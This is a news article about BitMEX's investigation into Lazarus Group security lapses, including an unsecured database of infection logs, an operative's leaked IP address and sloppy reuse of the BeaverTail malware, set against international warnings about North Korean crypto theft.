In a stunning twist, cryptocurrency exchange BitMEX just exposed major security mistakes by the notorious Lazarus Group. This North Korean hacking team, linked to billion-dollar crypto heists, made surprisingly amateur errors. BitMEX researchers found critical flaws during a recent investigation. Their probe revealed exposed IP addresses and an unprotected database. These lapses offer rare insight into the group’s secretive operations.
Database Door Left Open
The discovery started with a failed attack. A Lazarus operative messaged a BitMEX employee on LinkedIn. Posing as a collaborator, the hacker proposed a fake NFT marketplace project. Fortunately, the employee recognised this classic Lazarus phishing tactic. Consequently, the employee immediately alerted BitMEX security. This triggered a full counter-operations investigation into the hackers’ methods. Investigators analysed malicious code shared by the hacker.
Significantly, they found it connected to an unsecured Supabase database instance. Lazarus used this platform for managing attack data. The database required no authentication whatsoever. BitMEX accessed it freely, uncovering 37 logs of infected machines. Each log contained usernames, hostnames, OS details, and IP addresses. Geolocations and timestamps were also exposed. Patterns suggested at least 10 accounts were likely developer or test machines.
Hacker’s Home Address Accidentally Revealed
One lapse proved particularly damaging. A hacker named “Victor” forgot basic operational security. He failed to use a VPN during his activities. Following, his real residential IP address leaked: 223.104.144.97. This traced directly to Jiaxing, China, under China Mobile. This was a huge mistake for the secretive group. Normally, Lazarus operatives carefully routed traffic through VPNs like Touch VPN and Astrill VPN.
The investigation exposed more carelessness. Lazarus reused code from known “BeaverTail” malware. Palo Alto’s Unit 42 previously documented this tool. It steals credentials and logs victim data. However, Lazarus implemented it poorly. BitMEX easily disassembled the JavaScript using Webcrack. This revealed identifiers for Chrome extensions. It also exposed connections to a malicious URL.
BitMEX’s report highlighted a clear asymmetry within Lazarus. “Frontline” teams conduct low-skill social engineering, like phishing on LinkedIn. Meanwhile, advanced developers craft sophisticated malware and exploits. This suggests the group operates in fragmented sub-teams. Less skilled members handle initial victim targeting and engagement. Experts then take over after gaining access. Such structure creates potential security gaps between teams.
Global Alerts
These findings amplify worldwide concern. Federal agencies globally are actively probing DPRK-linked hackers. In September 2024, the FBI specifically warned about Lazarus social engineering scams. These included phishing using fake crypto job offers. Then, in January 2025, Japan, the US, and South Korea echoed this warning. They labelled Lazarus activity a direct threat to the financial system. Furthermore, Bloomberg reports suggest G7 leaders will discuss countering Lazarus at their next summit.
Capitalising on the exposed database, BitMEX built a monitoring program. This tool tracks new infections logging data into the Supabase instance. Since March 31, 2025, it recorded 856 entries. These involved 174 unique user/hostname combinations. The exchange also established an internal system. This proactively detects future Lazarus attacks and their operational errors. However, BitMEX focused on new discoveries. They deliberately avoided re-analysing the known BeaverTail malware component.
Why These Lapses Matter
Lazarus Group remains a top crypto threat, tied to North Korea’s cyber warfare. Chainalysis attributes $1.34 billion in 2024 crypto thefts to them across 47 incidents. Their attacks often start with social engineering. For instance, a phishing trick enabled February 2025’s massive $1.4 billion Bybit hack.
BitMEX’s findings reveal a jarring mix of sophistication and stunningly basic errors. The exposed China IP raises location questions, though its meaning is unclear. Similarly, the unsecured Supabase shows reliance on modern tools but poor configuration. Ultimately, these holes offer ways to potentially disrupt the group.
Evolving Threat
Despite these setbacks, Lazarus remains extremely dangerous. BitMEX stresses their success targeting less sophisticated “second-string” hackers. The group’s elite core likely remains highly capable. The exposed IP and database don’t fully identify Lazarus members. Their anonymity largely persists. Nevertheless, the crypto community must stay vigilant. BitMEX urges continuous monitoring and robust security protocols against such persistent threats. Global powers are now mobilising, recognising Lazarus as a critical security challenge.
Written By Fazal Ul Vahab C H
